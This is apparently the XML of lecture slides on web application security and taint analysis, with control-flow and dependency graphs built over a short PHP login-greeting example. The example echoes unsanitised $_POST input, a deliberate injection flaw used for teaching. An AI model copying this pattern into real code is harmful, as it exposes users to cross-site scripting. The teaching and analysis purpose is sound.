              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>html_entity_decode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>($a);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>echo $a; // I'll &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>quot;walk&amp;quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>; the &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>lt;b&amp;gt;dog&amp;lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>b&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>; now</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>echo $b; // I'll "walk" the &lt;b&gt;dog&lt;/b&gt; now</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>?&gt;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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Common Vulnerabilities and Defenses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Objectives and Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Opportunities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>References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Current Status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Most known Web application security vulnerabilities can be fixed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>There are code analysis tools that can help to detect such security vulnerabilities.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So, what are the problems?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 Example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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="群組 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2123728" y="1052736"/>
            <a:ext cx="4896544" cy="5400600"/>
            <a:chOff x="2483768" y="1052736"/>
            <a:chExt cx="4896544" cy="5400600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="文字方塊 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2483768" y="1052736"/>
              <a:ext cx="1403100" cy="36933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TW" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>PHP code</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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2483768" y="1412776"/>
              <a:ext cx="4896544" cy="5040560"/>
            </a:xfrm>
            <a:prstGeom prst="rect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01  &lt;?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php</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRP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02        $id = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty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$_POST["id"]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;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03        $dept = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty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$_POST["dept"]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;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04        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0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if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($dept == 0) {                    //guest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05	</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty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echo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Hello! guest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;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06	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displayWelcomePage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();  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07        }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08        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0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else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{                                      // staff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09	</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF6600"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>if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($id ==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admin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) {      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10	        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty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echo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Hello!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 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.$id;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11	        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displayManagementFun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();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12 	} </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="457200" indent="-457200">
                <a:buAutoNum type="arabicPlain" startAt="13"/>
              </a:pP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        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF6600"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>else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{ </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="457200" indent="-457200"/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14		        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty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echo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Hello!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 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.$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dept.$id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;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15	        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displayBasicFun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();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16             }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17        }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18  ?&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1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z="2600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Control Flow Graph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2411760" y="1124744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755576" y="3501008"/>
            <a:ext cx="2664296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05:  echo "Hello! guest";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06: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displayWelcomePage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10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2915816" y="4725224"/>
            <a:ext cx="2952328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10:  echo "Hello! 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".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$id;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11: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displayManagementFun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11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5940152" y="4725224"/>
            <a:ext cx="2880320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14:  echo "Hello! ".$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dept.$id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15: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displayBasicFun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28" name="文字方塊 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483768" y="227687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True</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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4427984" y="350100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True</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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4716016" y="227687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False</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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6660232" y="350100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False</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="橢圓 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3779912" y="5805264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4" name="直線單箭頭接點 33"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="2"/>
            <a:endCxn id="32" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4211960" y="5625244"/>
            <a:ext cx="36004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4" name="肘形接點 43"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="32" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1997674" y="4311058"/>
            <a:ext cx="1872288" cy="1692188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8" name="肘形接點 47"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="2"/>
            <a:endCxn id="32" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5868144" y="4581128"/>
            <a:ext cx="648072" cy="2376264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6" name="六邊形 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3239852" y="2276872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5" name="直線單箭頭接點 54"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3671503" y="2060451"/>
            <a:ext cx="432048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72" name="六邊形 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5004048" y="3501008"/>
            <a:ext cx="1728192" cy="720080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== "admin"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3" name="圖案 32"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="46" idx="0"/>
            <a:endCxn id="72" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4535995" y="2600908"/>
            <a:ext cx="1332000" cy="900100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2" name="圖案 41"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="46" idx="3"/>
            <a:endCxn id="9" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2087724" y="2600908"/>
            <a:ext cx="1152128" cy="900100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5" name="圖案 44"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="72" idx="3"/>
            <a:endCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="4391980" y="3861048"/>
            <a:ext cx="612068" cy="864176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9" name="圖案 48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="72" idx="0"/>
            <a:endCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6732240" y="3861048"/>
            <a:ext cx="648072" cy="864176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5" name="日期版面配置區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26" name="頁尾版面配置區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28" grpId="0"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="32" grpId="0" animBg="1"/>
      <p:bldP spid="46" grpId="0" animBg="1"/>
      <p:bldP spid="7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Dependency Graph (1/3)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7416316" y="2708920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7020272" y="1628800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id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4860032" y="1628800"/>
            <a:ext cx="208823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dept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5328084" y="2708920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$dept,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5400092" y="4149128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echo, 5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3275856" y="2708920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Hello! Guest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5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5" name="直線單箭頭接點 24"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5580088" y="2384860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線單箭頭接點 26"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="2"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7596312" y="2384860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肘形接點 28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="2"/>
            <a:endCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4571952" y="2744924"/>
            <a:ext cx="1008208" cy="1800200"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 61163"/>
            </a:avLst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35" name="矩形 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8028384" y="213285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8028384" y="321297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6012160" y="321297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dirty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8" name="矩形 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6012160" y="213285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dirty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9" name="矩形 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4283968" y="321297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ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>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6084168" y="465313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ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>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4" name="矩形 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395536" y="1340768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5" name="矩形 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539552" y="4101128"/>
            <a:ext cx="2664296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05:  echo "Hello! guest";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06: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displayWelcomePage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47" name="文字方塊 46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1980109" y="357301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True</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="橢圓 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1259632" y="5517232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50" name="六邊形 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1223628" y="2756952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3" name="直線單箭頭接點 52"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="44" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1526166" y="2405588"/>
            <a:ext cx="690275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5" name="直線單箭頭接點 54"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="45" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1535637" y="3765064"/>
            <a:ext cx="672128" cy="1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8" name="直線單箭頭接點 57"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="45" idx="2"/>
            <a:endCxn id="48" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1523648" y="5169180"/>
            <a:ext cx="696104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35" grpId="0"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="37" grpId="0"/>
      <p:bldP spid="38" grpId="0"/>
      <p:bldP spid="39" grpId="0"/>
      <p:bldP spid="40" grpId="0"/>
      <p:bldP spid="44" grpId="0" animBg="1"/>
      <p:bldP spid="45" grpId="0" animBg="1"/>
      <p:bldP spid="47" grpId="0"/>
      <p:bldP spid="48" grpId="0" animBg="1"/>
      <p:bldP spid="5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Dependency Graph (2/3)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5724128" y="5301208"/>
            <a:ext cx="1296144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echo, 10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131840" y="2276872"/>
            <a:ext cx="1584176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Hello! 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10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7344308" y="2276872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6948264" y="1196752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id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4788024" y="1196752"/>
            <a:ext cx="208823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dept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矩形 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5256076" y="2276872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$dept,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1" name="直線單箭頭接點 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="29" idx="2"/>
            <a:endCxn id="30" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5508080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線單箭頭接點 31"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="28" idx="2"/>
            <a:endCxn id="27" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7524304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 bwMode="auto">
          <a:xfrm>
            <a:off x="8028384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8028384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5940152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5940152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4067944" y="270892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Untainted</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="77" name="圖案 76"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="82" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4373852" y="2258996"/>
            <a:ext cx="1368152" cy="2268000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst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2" name="橢圓 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5292080" y="4077072"/>
            <a:ext cx="2160240" cy="504056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>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>str_concat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10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6" name="肘形接點 85"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="27" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6480264" y="2708972"/>
            <a:ext cx="1368200" cy="1368000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst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02" name="直線單箭頭接點 101"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="82" idx="4"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6012160" y="4941168"/>
            <a:ext cx="72008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06" name="矩形 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6588224" y="5805264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8" name="矩形 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6588224" y="465313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8" name="矩形 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395536" y="1268760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9" name="矩形 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395536" y="4725224"/>
            <a:ext cx="2952328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10:  echo "Hello! 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".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$id;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11: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displayManagementFun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41" name="文字方塊 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979712" y="428380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True</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="文字方塊 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979712" y="305966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False</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="橢圓 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1259632" y="5805264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4" name="直線單箭頭接點 43"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="39" idx="2"/>
            <a:endCxn id="43" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1691680" y="5625244"/>
            <a:ext cx="36004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5" name="六邊形 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1223628" y="2348880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7" name="六邊形 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1007604" y="3537088"/>
            <a:ext cx="1728192" cy="648000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== "admin"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2" name="直線單箭頭接點 51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="38" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1691283" y="2168463"/>
            <a:ext cx="360040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4" name="直線單箭頭接點 53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1619275" y="3249377"/>
            <a:ext cx="50326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5" name="直線單箭頭接點 54"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="39" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1605565" y="4459088"/>
            <a:ext cx="531477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0" name="文字方塊 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971728" y="6165304"/>
            <a:ext cx="6049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Note: a better analysis would take into account </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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$id == “admin”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.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27" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="33" grpId="0"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="35" grpId="0"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="37" grpId="0"/>
      <p:bldP spid="82" grpId="0" animBg="1"/>
      <p:bldP spid="106" grpId="0"/>
      <p:bldP spid="68" grpId="0"/>
      <p:bldP spid="38" grpId="0" animBg="1"/>
      <p:bldP spid="39" grpId="0" animBg="1"/>
      <p:bldP spid="41" grpId="0"/>
      <p:bldP spid="42" grpId="0"/>
      <p:bldP spid="43" grpId="0" animBg="1"/>
      <p:bldP spid="45" grpId="0" animBg="1"/>
      <p:bldP spid="47" grpId="0" animBg="1"/>
      <p:bldP spid="4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Dependency Graph (3/3)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5796136" y="5661248"/>
            <a:ext cx="1296144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echo, 14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203848" y="2276872"/>
            <a:ext cx="1584176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Hello! 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14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7416316" y="2276872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7020272" y="1196752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id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4860032" y="1196752"/>
            <a:ext cx="208823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dept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矩形 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5328084" y="2276872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$dept,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1" name="直線單箭頭接點 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="29" idx="2"/>
            <a:endCxn id="30" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5580088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線單箭頭接點 31"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="28" idx="2"/>
            <a:endCxn id="27" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7596312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 bwMode="auto">
          <a:xfrm>
            <a:off x="8100392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8100392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6012160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6012160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4139952" y="270892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Untainted</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty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46" name="橢圓 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4067944" y="3356992"/>
            <a:ext cx="2160240" cy="504056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>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>str_concat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14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1" name="肘形接點 50"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="30" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5274054" y="2726898"/>
            <a:ext cx="648120" cy="612068"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 69535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圖案 76"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="46" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4247964" y="2456892"/>
            <a:ext cx="648072" cy="1152128"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 69537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橢圓 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5364088" y="4725144"/>
            <a:ext cx="2160240" cy="504056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>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>str_concat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14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4" name="肘形接點 83"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="46" idx="4"/>
            <a:endCxn id="82" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5364088" y="3645024"/>
            <a:ext cx="864096" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000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肘形接點 85"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="27" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6246162" y="3050934"/>
            <a:ext cx="2016272" cy="1332148"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 77909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矩形 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5364088" y="386104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102" name="直線單箭頭接點 101"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="82" idx="4"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6228184" y="5445224"/>
            <a:ext cx="432048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06" name="矩形 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6444208" y="522920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07" name="矩形 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6444208" y="6165304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395536" y="1268760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1" name="矩形 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395536" y="4725224"/>
            <a:ext cx="2952328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14:  echo "Hello! ".$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dept.$id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15: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displayBasicFun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42" name="文字方塊 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979712" y="428380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False</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="文字方塊 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
